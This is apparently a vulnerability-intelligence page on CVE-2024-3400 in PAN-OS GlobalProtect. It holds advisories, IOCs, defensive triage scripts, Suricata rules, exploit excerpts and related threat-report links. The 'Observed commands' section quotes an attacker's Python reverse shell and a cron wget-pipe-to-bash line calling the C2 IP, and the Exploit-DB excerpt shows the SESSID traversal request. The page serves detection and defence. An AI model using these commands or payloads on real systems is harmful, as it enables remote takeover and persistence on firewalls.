CVE-2024-3400
published 2024-04-12
CVE-2024-3400: A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS…
Priority: P1 · 100 · critical · 10 (CVSS 3.1)
CVSS 3.1 vector: AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Ransomware · Initial access
CISA Known Exploited Vulnerabilitydue 2024-04-19
Exploited in the wild
EPSS: 100.00% (100.0th percentile)
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Affected (24 ranges)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| palo_alto_networks | pan-os | >= 10.2.0 < 10.2.9-h1 | 10.2.9-h1 |
| palo_alto_networks | pan-os | >= 11.0.0 < 11.0.4-h1 | 11.0.4-h1 |
| palo_alto_networks | pan-os | >= 11.1.0 < 11.1.2-h3 | 11.1.2-h3 |
| paloalto | cloud_ngfw | — | — |
| paloalto | pan-os | — | — |
| paloalto | prisma_access | — | — |
| paloaltonetworks | pan-os | — | — |
Detection & IOCs (extracted from sources)
Observed commands:
- command: `python -c "import sys,socket,os,pty;s=socket.socket(socket.AF_INET, socket.SOCK_STREAM);s.connect(('172.233.228[.]93',443));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn('/bin/bash')"`
- command: `printf "SHELL=/bin/bash\n\n* * * * * root wget -qO- http://172.233.228[.]93/policy | bash\n\n" > /etc/cron.d/update`
Detections:
- Monitor for creation or modification of /usr/lib/python3.6/site-packages/system.pth — the UPSTYLE backdoor installer drops this .pth file to achieve persistence via Python's path configuration mechanism.
- Alert on unexpected writes to /var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css — UPSTYLE appends command output to this legitimate CSS file as its exfiltration channel.
- Hunt for HTTP requests to the firewall containing the URI pattern img{base64-encoded-data} — UPSTYLE parses /var/log/pan/sslvpn_ngx_error.log for this pattern to extract and execute attacker commands.
- Detect outbound connections from the GlobalProtect firewall to worldtimeapi.org — observed as attacker-controlled beacon traffic during post-exploitation.
- Alert on SMB/WinRM lateral movement originating from the GlobalProtect firewall device IP — attackers pivoted internally using a domain admin service account after compromising the firewall.
- Detect direct-to-IP HTTP requests (no hostname) from the firewall device for payload download — attackers used direct-to-IP HTTP to retrieve tools from C2.
- Look for the process string 'import sys,socket,os' in the running process list on PAN-OS devices — the reverse shell one-liner contains this distinctive string, detectable via ps -ef.
- Check for the presence of /etc/cron.d/update on PAN-OS devices — the attacker's 'patch' script creates this cron job to periodically pull and execute a remote shell script.
- Generate a Tech Support File from the PAN-OS device and analyze its logs for forensic artifacts to detect compromise.
Notes:
- Cloud NGFW, Panorama appliances, and Prisma Access are explicitly NOT affected by CVE-2024-3400 — only specific on-prem PAN-OS versions with GlobalProtect enabled are vulnerable.
- The UPSTYLE backdoor files (filenames and indicators) were altered by UTA0218 per victim — do not rely solely on static IOCs; behavioral detection is essential.
- The C2 server at 172.233.228.93 enforced an IP-based access control list — it only responded to requests from the compromised firewall device, making external validation of the C2 from other IPs impossible.
- Applying mitigations or patches will NOT remediate an existing compromise — affected organizations must separately investigate for breach.
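The host-side checks in the detection notes above (the system.pth persistence file, the /etc/cron.d/update cron job, growth of bootstrap.min.css, the reverse-shell import string in the process list, and the img[base64] command marker in sslvpn_ngx_error.log) can be run as one triage script over a Tech Support File extract or a live host. The following is an added example written for this page, not code from any of the cited sources; the paths and strings come from the notes above, and the process-list and log samples are constructed for the demonstration.

```python
"""Host-artifact triage for the CVE-2024-3400 / UPSTYLE indicators listed above.

Added example, not code from the page's sources. It checks an extracted
Tech Support File (or a live host) for the artifacts the detection notes
name. Sample inputs at the bottom are constructed, not real captures.
"""
import base64
import binascii
import os
import re

# Paths named in the detection notes (UPSTYLE .pth persistence, cron persistence).
ARTIFACT_PATHS = {
    "/usr/lib/python3.6/site-packages/system.pth": "UPSTYLE .pth persistence",
    "/etc/cron.d/update": "attacker cron job pulling a remote script",
}
# Legitimate CSS file that UPSTYLE appends command output to.
OUTPUT_CHANNEL = "/var/appweb/sslvpndocs/global-protect/portal/css/bootstrap.min.css"
# Distinctive substring of the reverse-shell one-liner (from the notes).
SHELL_MARKER = "import sys,socket,os"
# UPSTYLE command marker as described: img[<base64 blob>] inside the error log.
IMG_CMD_RE = re.compile(r"img\[([A-Za-z0-9+/=]{10,})\]")


def find_host_artifacts(existing_paths, css_size_delta=None):
    """Return (path, reason) pairs for indicator files present on the host.

    existing_paths: iterable of absolute paths that exist (from os.path.exists
    on a live host, or from a Tech Support File listing).
    css_size_delta: optional size difference of bootstrap.min.css versus a
    known-good copy; growth is suspicious because UPSTYLE appends to it.
    """
    present = set(existing_paths)
    hits = [(p, why) for p, why in ARTIFACT_PATHS.items() if p in present]
    if css_size_delta is not None and css_size_delta > 0:
        hits.append((OUTPUT_CHANNEL, f"grew by {css_size_delta} bytes (appended output?)"))
    return hits


def scan_process_list(ps_output):
    """Return the ps -ef lines that contain the reverse-shell import string."""
    return [line for line in ps_output.splitlines() if SHELL_MARKER in line]


def scan_error_log(lines):
    """Return (base64_blob, decoded_text) for each img[...] marker found.

    Decoding is for analyst review only; nothing here executes the content.
    """
    findings = []
    for line in lines:
        for blob in IMG_CMD_RE.findall(line):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except (binascii.Error, ValueError):
                decoded = "<not valid base64>"
            findings.append((blob, decoded))
    return findings


def collect_existing_paths(root="/"):
    """Live-host helper: which indicator paths exist under root (default: /)."""
    return [p for p in ARTIFACT_PATHS if os.path.exists(os.path.join(root, p.lstrip("/")))]


# Constructed sample inputs (not real captures) for a stand-alone run.
SAMPLE_PS = """UID PID PPID C STIME TTY TIME CMD
root 1 0 0 10:00 ? 00:00:01 /sbin/init
root 4242 1 0 10:05 ? 00:00:00 python -c import sys,socket,os,pty;...
"""
SAMPLE_LOG = [
    '2024/04/12 10:06:01 [error] 9#0: *1 open() "/var/appweb/sslvpndocs/img[aWQ7dW5hbWUgLWE=]" failed',
    '2024/04/12 10:06:02 [error] 9#0: *2 open() "/var/appweb/sslvpndocs/favicon.ico" failed',
]

if __name__ == "__main__":
    print("files:", find_host_artifacts(collect_existing_paths()))
    print("processes:", scan_process_list(SAMPLE_PS))
    print("log markers:", scan_error_log(SAMPLE_LOG))
```

On a real device the process list and error log come from the Tech Support File, and the CSS size delta from comparing the on-box bootstrap.min.css with the same file from a clean install of the same PAN-OS version; as the notes say, filenames were varied per victim, so an empty result from these static checks does not clear a host.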
CVSS provenance
- nvd: v3.1 · 10.0 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
- vulncheck: 10.0 CRITICAL
- cisa: 10.0 CRITICAL
GHSA
GHSA-v475-xhc9-wfxg · ghsa_unreviewed · 2024-04-12 · CVE-2024-3400 [CRITICAL] CWE-20
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Fixes for PAN-OS 10.2, PAN-OS 11.0, and PAN-OS 11.1 are in development and are expected to be released by April 14, 2024. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability. All other versions of PAN-OS are also not impacted.
VulnCheck
Palo Alto Networks PAN-OS Command Injection Vulnerability · vulncheck · 2024 · CVSS 10.0 · CVE-2024-3400 [CRITICAL] CWE-20
Palo Alto Networks PAN-OS GlobalProtect feature contains a command injection vulnerability that allows an unauthenticated attacker to execute commands with root privileges on the firewall.
Affected: Palo Alto Networks PAN-OS
Required Action: Apply mitigations per vendor instructions as they become available. Otherwise, users with vulnerable versions of affected devices should enable Threat Prevention IDs available from the vendor. See the vendor bulletin for more details and a patch release schedule.
Known Ransomware Campaign Use: Known
Exploitation References: https://security.paloaltonetworks.com/CVE-2024-3400; https://unit42.paloaltonetworks.com/cve-2024-3400/; https://www.cisa.gov/sites/default/files/feeds/known_exploited_v
CISA ICS
Siemens RUGGEDCOM APE1808 Devices Configured with Palo Alto Networks Virtual NGFW · cisa_ics · 2024-04-25 · CVSS 10.0 · [CRITICAL]
ICS Advisory · Release Date: April 25, 2024 · Alert Code: ICSA-24-116-03
As of January 10, 2023, CISA will no longer be updating ICS security advisories for Siemens product vulnerabilities beyond the initial advisory. For the most up-to-date information on vulnerabilities in this advisory, please see Siemens' ProductCERT Security Advisories (CERT Services | Services | Siemens Global).
## 1. EXECUTIVE SUMMARY
- CVSS v4 10.0
- ATTENTION: Exploitable remotely/low attack complexity
- Vendor: Siemens
- Equipment: RUGGEDCOM APE1808
- Vulnerability: Command Injection
## 2. RISK EVALUATION
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary
CISA
Palo Alto Networks PAN-OS Command Injection Vulnerability · cisa · 2024-04-12 · CVSS 10.0 · CVE-2024-3400 [CRITICAL] CWE-20
Affected: Palo Alto Networks PAN-OS
Palo Alto Networks PAN-OS GlobalProtect feature contains a command injection vulnerability that allows an unauthenticated attacker to execute commands with root privileges on the firewall.
Required Action: Apply mitigations per vendor instructions as they become available. Otherwise, users with vulnerable versions of affected devices should enable Threat Prevention IDs available from the vendor. See the vendor bulletin for more details and a patch release schedule.
Notes: https://security.paloaltonetworks.com/CVE-2024-3400 ; https://nvd.nist.gov/vuln/detail/CVE-2024-3400
Remediation Due Date: 2024-04-19
Palo Alto
PAN-OS: Arbitrary File Creation Leads to OS Command Injection Vulnerability in GlobalProtect · vendor_paloalto · 2024-04-12 · CVSS 10.0 · CVE-2024-3400 [CRITICAL] CWE-20
A command injection as a result of arbitrary file creation vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall.
Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Customers should continue to monitor this security advisory for the latest updates and product guidance.
Affected products: Cloud NGFW, PAN-OS, Prisma Access
Solution: We strongly advise customers to immediately upgrade to a fixed version of PAN-OS to protect their devices even when workarounds and mit
Suricata
ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Directory Traversal in Session Cookie (CVE-2024-3400) · suricata · 2025-10-02 · CVSS 10.0 · CVE-2024-3400 [CRITICAL]
Rule:
```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Directory Traversal in Session Cookie (CVE-2024-3400)"; flow:established,to_server; http.cookie; content:"SESSID="; startswith; content:"|2e 2e 2f 2e 2e 2f|"; http.request_body; content:"gwHipReportCheck|3d|"; fast_pattern; http.method; content:"POST"; reference:url,labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/; reference:url,www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/; reference:cve,2024-3400; classtype:trojan-activity; sid:2065037; rev:1; metadata:affected_product Palo_Alto_Networks, attack_ta
```
Suricata
ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400) · suricata · 2024-04-16 · CVSS 10.0 · CVE-2024-3400 [CRITICAL]
Rule:
```
alert http any any -> $HOME_NET any (msg:"ET WEB_SPECIFIC_APPS Palo Alto GlobalProtect Session Cookie Command Injection Attempt (CVE-2024-3400)"; flow:established,to_server; http.cookie; content:"SESSID="; startswith; content:"/opt/panlogs/tmp/device_telemetry/"; distance:0; fast_pattern; pcre:"/(?:\x60|\x7b).*(?:\x24\x7bIFS\x7d|\x2c)/R"; reference:cve,2024-3400; reference:url,labs.watchtowr.com/palo-alto-putting-the-protecc-in-globalprotect-cve-2024-3400/; reference:url,www.volexity.com/blog/2024/05/15/detecting-compromise-of-cve-2024-3400-on-palo-alto-networks-globalprotect-devices/; classtype:trojan-activity; sid:2052122; rev:2; metadata:affected_product Palo_Alto_Networks, attac
```
Suricata
ET RETIRED Possible UPSTYLE Command Output Retrieval Attempt · suricata · 2024-04-12 · CVE-2024-3400
Rule:
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET RETIRED Possible UPSTYLE Command Output Retrieval Attempt"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"/global-protect/portal/css/bootstrap.min.css"; fast_pattern; http.header_names; to_lowercase; content:!"|0d 0a|referer|0d 0a|"; reference:url,www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/; reference:url,unit42.paloaltonetworks.com/cve-2024-3400/; classtype:trojan-activity; sid:2052024; rev:3; metadata:affected_product Palo_Alto_Networks, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2024_04_12, cve CVE_2024_3400, deploy
```
Suricata
ET MALWARE Possible UPSTYLE Payload Retrieval Attempt · suricata · 2024-04-12 · CVE-2024-3400
Rule:
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Possible UPSTYLE Payload Retrieval Attempt"; flow:established,to_client; http.stat_code; content:"200"; file.data; content:"systempth|20 3d 20 22|/usr/lib/python3.6/site-packages/system.pth|22|"; fast_pattern; content:"import base64|3b|exec|28|base64.b64decode"; within:100; content:"|22|/opt/pancfg/mgmt/licenses/PA_VM|60 2a 22|"; distance:0; reference:url,www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/; reference:url,unit42.paloaltonetworks.com/cve-2024-3400/; reference:md5,0c1554888ce9ed0da1583dbdf7b31651; classtype:trojan-activity; sid:2052025; rev:1; metadata:affected_prod
```
Suricata
ET MALWARE Possible UPSTYLE Command Attempt · suricata · 2024-04-12 · CVE-2024-3400
Rule:
```
alert http $EXTERNAL_NET any -> $HOME_NET any (msg:"ET MALWARE Possible UPSTYLE Command Attempt"; flow:established,to_server; http.method; content:"GET"; http.uri; content:"img|5b|"; fast_pattern; pcre:"/img\x5b[a-zA-Z0-9+/=]{10,}\x5d/U"; content:!"|0d 0a|Referer|0d 0a|"; reference:url,www.volexity.com/blog/2024/04/12/zero-day-exploitation-of-unauthenticated-remote-code-execution-vulnerability-in-globalprotect-cve-2024-3400/; reference:url,unit42.paloaltonetworks.com/cve-2024-3400/; classtype:trojan-activity; sid:2052026; rev:1; metadata:affected_product Palo_Alto_Networks, attack_target Networking_Equipment, tls_state TLSDecrypt, created_at 2024_04_12, cve CVE_2024_3400, deployment Perimeter, deployment SSLDecrypt, malware_family UPSTYLE,
```
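The two ET WEB_SPECIFIC_APPS rules above (sid 2065037 and sid 2052122) only fire where the IDS sees decrypted GlobalProtect traffic. Where that is not the case but the front end's request logs are available, the same conditions can be re-applied offline. The following is an added example written for this page, not an Emerging Threats artifact; it approximates the rules' logic (a Cookie header that begins with SESSID= and contains ../../ on a POST whose body carries gwHipReportCheck=; a SESSID that references /opt/panlogs/tmp/device_telemetry/ followed by a backtick or brace and later ${IFS} or a comma) over request records whose shape (method, headers, body dicts) is assumed. The sample records are constructed, not captured traffic.

```python
"""Request-log checks mirroring the two ET GlobalProtect session-cookie rules.

Added example, not code from Emerging Threats or the page's other sources.
The request-record format (dicts with method/uri/headers/body) is an
assumption; adapt the loader to whatever the reverse proxy or WAF logs.
"""
import re

TRAVERSAL = "../../"
TELEMETRY_DIR = "/opt/panlogs/tmp/device_telemetry/"
# Same intent as the rule's pcre: a backtick or '{' followed later by ${IFS} or ','.
SHELL_META_RE = re.compile(r"(?:`|\{).*(?:\$\{IFS\}|,)")


def sessid_value(headers):
    """Return the SESSID cookie value when it is the first cookie, else None.

    Both rules anchor 'SESSID=' at the start of the Cookie header (startswith),
    so a SESSID that appears after other cookies is deliberately ignored here.
    """
    cookie = headers.get("Cookie", "")
    if not cookie.startswith("SESSID="):
        return None
    return cookie[len("SESSID="):].split(";", 1)[0]


def matches_traversal_rule(req):
    """sid 2065037: traversal in the session cookie on a HIP-report POST."""
    sess = sessid_value(req["headers"])
    return (
        req["method"] == "POST"
        and sess is not None
        and TRAVERSAL in sess
        and "gwHipReportCheck=" in req.get("body", "")
    )


def matches_injection_rule(req):
    """sid 2052122: SESSID aimed at the telemetry directory plus shell metacharacters."""
    sess = sessid_value(req["headers"])
    if sess is None:
        return False
    idx = sess.find(TELEMETRY_DIR)
    if idx < 0:
        return False
    # The rule's pcre uses /R, i.e. it matches relative to the end of the previous content.
    return SHELL_META_RE.search(sess[idx + len(TELEMETRY_DIR):]) is not None


def triage(requests):
    """Return (record_index, rule_sid) pairs for every request that trips a rule."""
    hits = []
    for i, req in enumerate(requests):
        if matches_traversal_rule(req):
            hits.append((i, 2065037))
        if matches_injection_rule(req):
            hits.append((i, 2052122))
    return hits


# Constructed sample records (not real traffic).
SAMPLE_REQUESTS = [
    {   # ordinary portal login with a normal session id
        "method": "POST", "uri": "/ssl-vpn/login.esp",
        "headers": {"Cookie": "SESSID=0123456789abcdef; lang=en"},
        "body": "user=alice",
    },
    {   # traversal in SESSID together with a HIP report body
        "method": "POST", "uri": "/ssl-vpn/hipreport.esp",
        "headers": {"Cookie": "SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/CONSTRUCTED"},
        "body": "gwHipReportCheck=1",
    },
    {   # telemetry directory followed by brace/comma metacharacters
        "method": "POST", "uri": "/ssl-vpn/hipreport.esp",
        "headers": {"Cookie": "SESSID=/../../../opt/panlogs/tmp/device_telemetry/{CONSTRUCTED,SAMPLE}"},
        "body": "user=bob",
    },
]

if __name__ == "__main__":
    for idx, sid in triage(SAMPLE_REQUESTS):
        print(f"record {idx}: matches sid {sid}")
```

Note that the third sample record trips only the injection rule: it does contain ../../ but its body carries no gwHipReportCheck=, which is exactly the extra condition sid 2065037 requires, so in a real log a single request can reasonably show up under both sids or under just one.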
Exploit-DB
Palo Alto PAN-OS < v11.1.2-h3 - Command Injection and Arbitrary File Creation · exploitdb · 2024-04-21 · CVSS 10.0 · CVE-2024-3400 [CRITICAL]
Code excerpt (truncated at both ends in the source):
```python
    # ... bool:   (the enclosing function signature is truncated in the source)
    ret = False
    uri = "/ssl-vpn/hipreport.esp"
    s = requests.Session()
    r = ""
    headers = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36", # Windows 10 Chrome 118.0.0.0
        "Content-Type": "application/x-www-form-urlencoded",
        "Cookie": \
            f"SESSID=../../../var/appweb/sslvpndocs/global-protect/portal/images/{file}"
    }
    headers_noCookie = {
        "User-Agent" : \
            "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/118.0.0.0 Safari/537.36" # Windows 10 Chrome 118.0.0.0
    }
    if not "http://" or not "https://" in target:
        target = "http://" + target
    try:
        r = s.post( (target + uri), verify=False, headers=headers, timeout=10 )
    except requests.exceptions.Timeout or requests
```
Nuclei
GlobalProtect - OS Command Injection · nuclei · CVSS 10.0 · CVE-2024-3400 [CRITICAL]
A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the firewall. Cloud NGFW, Panorama appliances, and Prisma Access are not impacted by this vulnerability.
Template (truncated in the source):
```yaml
id: CVE-2024-3400
info:
  name: GlobalProtect - OS Command Injection
  author: salts,parthmalhotra
  severity: critical
  description: |
    A command injection vulnerability in the GlobalProtect feature of Palo Alto Networks PAN-OS software for specific PAN-OS versions and distinct feature configurations may enable an unauthenticated attacker to execute arbitrary code with root privileges on the fi
```
Metasploit
Palo Alto Networks PAN-OS Unauthenticated Remote Code Execution · metasploit
This module exploits two vulnerabilities in Palo Alto Networks PAN-OS that allow an unauthenticated attacker to create arbitrarily named files and execute shell commands. Configuration requirements are PAN-OS with GlobalProtect Gateway or GlobalProtect Portal enabled and telemetry collection on (default). Affected versions include < 11.1.0-h3, < 11.1.1-h1, < 11.1.2-h3, < 11.0.2-h4, < 11.0.3-h10, < 11.0.4-h1, < 10.2.5-h6, < 10.2.6-h3, < 10.2.8-h3, and < 10.2.9-h1. Payloads may take up to one hour to execute, depending on how often the telemetry service is set to run.
Tenable
Inside the customer environment: Where threat actors, vulnerabilities, and exposed assets intersect · blogs_tenable · 2026-05-27 · tagged CVE-2023-4966
Tenable Research has developed a graph-based model linking 600+ threat groups to real-world customer exposures. It reveals which vulnerabilities sit at the intersection of severity, active exploit
Mandiant
Ransomware Under Pressure: Tactics, Techniques, and Procedures in a Shifting Threat Landscape · blogs_mandiant · 2026-03-16 · Google Threat Intelligence Group
Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark
## Introduction
Since 2018, when many financially motivated threat actors began shifting their monetization strategy to post-compromise ransomware deployments, ransomware has become one of the most pervasive threats to organizations across almost every industry vertical and region. In recent years ransomware operations have evolved, creating a robust ecosystem that has lowered the barrier to entry via the commoditization and specialization of the supporting underground communities, w
Mandiant
Ransomware Tactics, Techniques, and Procedures in a Shifting Threat Landscape · blogs_mandiant · 2026-03-16 (March 16, 2026) · Google Threat Intelligence Group · Written by: Bavi Sadayappan, Zach Riddle, Ioana Teaca, Kimberly Goody, Genevieve Stark
Recorded Future
2025 Cloud Threat Hunting and Defense Landscape · blogs_recorded_future · 2026-02-19
## Executive Summary
Insikt Group has observed continued trends of growth and increased activity of threat actors leveraging and exploiting cloud infrastructure to broaden the number of victims they target and infect. Recent reporting across the observed incidents shows that cloud-focused threats are converging on a few consistent patterns, which serve as the main sections of this report:
- Exploitation and Misconfiguration
- Cloud Abuse
- Cloud Ransomware
- Credential Abuse, Account Takeover, and Unauthorized Access
- Third-Party Compromise
Across cases, initial access frequently comes from vulnerable or misconfigured services exposed to the internet — including application delivery controllers, monitoring dashboards, email security gateway
Greynoiseio
The Noise in the Silence: Unmasking CISA's Hidden KEV Ransomware Updates · blogs_greynoiseio · 2026-02-02
Zscaler
Malicious PyPI Packages Deliver SilentSync RAT | ThreatLabz · blogs_zscaler · 2025-09-17
Tenable
Cybersecurity Snapshot: Expert Advice for Securing Critical Infrastructure’s OT and Industrial Control Systems, IoT Devices and Network Infrastructure · blogs_tenable · 2025-09-05
Tenable
Chinese State-Sponsored Actors Compromising Global Networks · blogs_tenable · 2025-08-29
Tenable
Cybersecurity Snapshot: Agentic AI Security in Focus With Anthropic’s Chilling Abuse Disclosure and CSA’s New Identity Protection Framework · blogs_tenable · 2025-08-29
Bleepingcomputer
Global Salt Typhoon hacking campaigns linked to Chinese tech firms · blogs_bleepingcomputer · 2025-08-27 · CVSS 9.8 [CRITICAL] · by Lawrence Abrams
The U.S. National Security Agency (NSA), the UK's National Cyber Security Centre (NCSC), and partners from over a dozen countries have linked the Salt Typhoon global hacking campaigns to three China-based technology firms.
According to the joint advisories [NSA, NCSC], Sichuan Juxinhe Network Technology Co. Ltd., Beijing Huanyu Tianqiong Information Technology Co., and Sichuan Zhixin Ruijie Network Technology Co. Ltd. have provided cyber products and services to China's Ministry of State Security and the People's Liberation Army, enabling cyber espionage operations tracked as Salt Typhoon.
Since at least 2021, the Chinese threat actors have breached government, telecommunications, transportation
Unit42
2025 Unit 42 Global Incident Response Report: Social Engineering Edition · blogs_unit42 · 2025-07-30 · Unit 42 · Published: July 30, 2025
Topics: Business Email Compromise, Cybercrime, Malware, Threat Actor Groups, Trend Reports, Agent Serpens, Agentic AI, ClickFix, Credential Harvesting, Lumma Stealer, MFA, Muddled Libra, Redline infostealer, Remote Access Tool, SEO poisoning, Social engineering
## Executive Summary
We see social engineering evolving into one of the most reliable, scalable and impactful intrusion methods in 2025 for five key reasons:
First, social engineering remained the top initial access vector in Unit 42 incident response cases between May 2024 and May 2025: 36% of all incidents in the IR caseload began with a social engineering tactic. These attacks consistently bypassed technical controls by targeting human workflows, exploiting trust and manipulating identity systems. More than one-third of social engineering incidents involved non-phishing techniques, including search engine optimization (SEO) poisoning, fake system prompts and help desk manipulation.
Second, high-touch attacks are on the rise. Threat actors such as Muddled Libra bypass multi-factor aut
Bleepingcomputer
Chinese hackers breached National Guard to steal network configurations · blogs_bleepingcomputer · 2025-07-17 · by Lawrence Abrams
The Chinese state-sponsored hacking group known as Salt Typhoon breached and remained undetected in a U.S. Army National Guard network for nine months in 2024, stealing network configuration files and administrator credentials that could be used to compromise other government networks.
Salt Typhoon is a Chinese state-sponsored hacking group that is believed to be affiliated with China's Ministry of State Security (MSS) intelligence agency. The hacking group has gained notoriety over the past two years for its wave of attacks on telecommunications and broadband providers worldwide, including AT&T, Verizon, Lumen, Charter, Windstream, and Viasat.
The goal of some of these attacks was to gain
Tenable
Frequently Asked Questions About Iranian Cyber Operations · blogs_tenable · 2025-06-27
Tenable
Reducing Remediation Time Remains a Challenge: How Tenable Vulnerability Watch Can Help · blogs_tenable · 2025-04-25
Tenable
Verizon 2025 DBIR: Tenable Research Collaboration Shines a Spotlight on CVE Remediation Trends
blogs_tenable·2025-04-23
Verizon 2025 DBIR: Tenable Research Collaboration Shines a Spotlight on CVE Remediation Trends
Greynoiseio
GreyNoise Detects Active Exploitation of Silk Typhoon-Linked CVEs
blogs_greynoiseio·2025-03-06·CVSS 9.1
[CRITICAL] GreyNoise Detects Active Exploitation of Silk Typhoon-Linked CVEs
Bleepingcomputer
Silk Typhoon hackers now target IT supply chains to breach networks
blogs_bleepingcomputer·2025-03-05
Silk Typhoon hackers now target IT supply chains to breach networks
## Silk Typhoon hackers now target IT supply chains to breach networks
## Bill Toulas
"After successfully compromising a victim, Silk Typhoon uses the stolen keys and credentials to infiltrate customer networks where they can then abuse a variety of deployed applications, including Microsoft services and others, to achieve their espionage objectives."
## Silk Typhoon storms IT supply chains
Silk Typhoon is a Chinese state-sponsored espionage group known for hacking the U.S. Office of Foreign Assets Control (OFAC) office in early December 2024 and stealing data from the Committee on Foreign Investment in the United States (CFIUS).
Microsoft reports that Silk Typhoon switched tactics around that period, abusing stolen API keys and compromised credentials for IT providers, identity manag
Greynoiseio
GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
blogs_greynoiseio·2025-02-26·CVSS 9.8
[CRITICAL] GreyNoise Detects Active Exploitation of CVEs Mentioned in Black Basta’s Leaked Chat Logs
Qualys
Defense Lessons From the Black Basta Ransomware Playbook
blogs_qualys·2025-02-25
Defense Lessons From the Black Basta Ransomware Playbook
## Table of Contents
Know Your Enemy's Playbook
Attackers Move Fast
How Qualys Can Help
The cybersecurity world was rocked last week by a massive leak of Black Basta’s internal communications that emerged from the group’s chat logs. Triggered by internal conflicts and a retaliatory data dump following attacks on Russian banks, the exposed records offer a rare glimpse into Black Basta’s tactics, operations, and leadership.
We’ve analyzed these newly unveiled tactics, and in this blog, we equip security teams with clear, actionable insights. We aim to highlight the key lessons learned—like immediate patching, tighter access controls, and rapid incident response—and provide an urgent call to action. This practical guide aims to help organizations strengthen their defenses against evolving
Bleepingcomputer
Over 2,000 Palo Alto firewalls hacked using recently patched bugs
blogs_bleepingcomputer·2024-11-21·CVSS 9.3
CVE-2024-0012 [CRITICAL] Over 2,000 Palo Alto firewalls hacked using recently patched bugs
## Over 2,000 Palo Alto firewalls hacked using recently patched bugs
## Sergiu Gatlan
Hackers have already compromised thousands of Palo Alto Networks firewalls in attacks exploiting two recently patched zero-day vulnerabilities.
The two security flaws are an authentication bypass (CVE-2024-0012) in the PAN-OS management web interface that remote attackers can exploit to gain administrator privileges and a PAN-OS privilege escalation (CVE-2024-9474) that helps them run commands on the firewall with root privileges.
While CVE-2024-9474 was disclosed this Monday, the company first warned customers on November 8 to restrict access to their next-generation firewalls because of a potential RCE flaw (which was tagged last Friday as CVE-2024-0012).
Palo Alto Networks is still investigat
Bleepingcomputer
Cisco bug lets hackers run commands as root on UWRB access points
blogs_bleepingcomputer·2024-11-06·CVSS 10.0
CVE-2024-20418 [CRITICAL] Cisco bug lets hackers run commands as root on UWRB access points
## Cisco bug lets hackers run commands as root on UWRB access points
## Sergiu Gatlan
Cisco has fixed a maximum severity vulnerability that allows attackers to run commands with root privileges on vulnerable Ultra-Reliable Wireless Backhaul (URWB) access points that provide connectivity for industrial wireless automation.
Tracked as CVE-2024-20418, this security flaw was found in Cisco's Unified Industrial Wireless Software's web-based management interface. Unauthenticated threat actors can exploit it in low-complexity command injection attacks that don't require user interaction.
"This vulnerability is due to improper validation of input to the web-based management interface. An attacker could exploit this vulnerability by sending crafted HTTP requests to the web-based management int
Bleepingcomputer
Iranian hackers work with ransomware gangs to extort breached orgs
blogs_bleepingcomputer·2024-08-28·CVSS 8.6
[HIGH] Iranian hackers work with ransomware gangs to extort breached orgs
## Iranian hackers work with ransomware gangs to extort breached orgs
## Sergiu Gatlan
An Iran-based hacking group known as Pioneer Kitten is breaching defense, education, finance, and healthcare organizations across the United States and working with affiliates of several ransomware operations to extort the victims.
The threat group (also tracked as Fox Kitten, UNC757, and Parisite) has been active since at least 2017 and is believed to have a suspected nexus to the Iranian government.
As CISA, the FBI, and the Defense Department's Cyber Crime Center warned today in a joint advisory, the attackers are monetizing their access to compromised organizations' networks by selling domain admin credentials and full domain control privileges on cyber marketplaces while using the 'Br0k3r' and,
Tenable
AA24-241A : Joint Cybersecurity Advisory on Iran-based Cyber Actors Targeting US Organizations
blogs_tenable·2024-08-28
AA24-241A : Joint Cybersecurity Advisory on Iran-based Cyber Actors Targeting US Organizations
Qualys
Cybersecurity Threat Landscape 2024 Midyear Review
blogs_qualys·2024-08-06
